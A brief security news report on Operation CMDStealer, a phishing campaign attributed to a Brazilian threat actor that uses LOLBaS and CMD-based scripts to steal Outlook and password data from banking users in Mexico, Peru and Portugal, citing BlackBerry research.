Online banking accounts in Mexico, Peru, and Portugal have been subjected to the new financially motivated Operation CMDStealer campaign attributed to a Brazilian threat actor, which leverages social engineering techniques to facilitate the deployment of living-off-the-land binaries and scripts, as well as CMD-based scripts for fund exfiltration, according to The Hacker News.
Attacks under the campaign commence with the delivery of Spanish and Portuguese emails purporting tax or traffic violations, which include an HTML attachment that allows the retrieval of a next-stage payload as a RAR archive file, which eventually results in Microsoft Outlook and password information theft, a report from the BlackBerry Research and Intelligence Team revealed.
"LOLBaS and CMD-based scripts help threat actors avoid detection by traditional security measures. The scripts leverage built-in Windows tools and commands, allowing the threat actor to evade endpoint protection platform (EPP) solutions, and bypass security systems," said BlackBerry, which also noted attackers' increased targeting of online business accounts.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds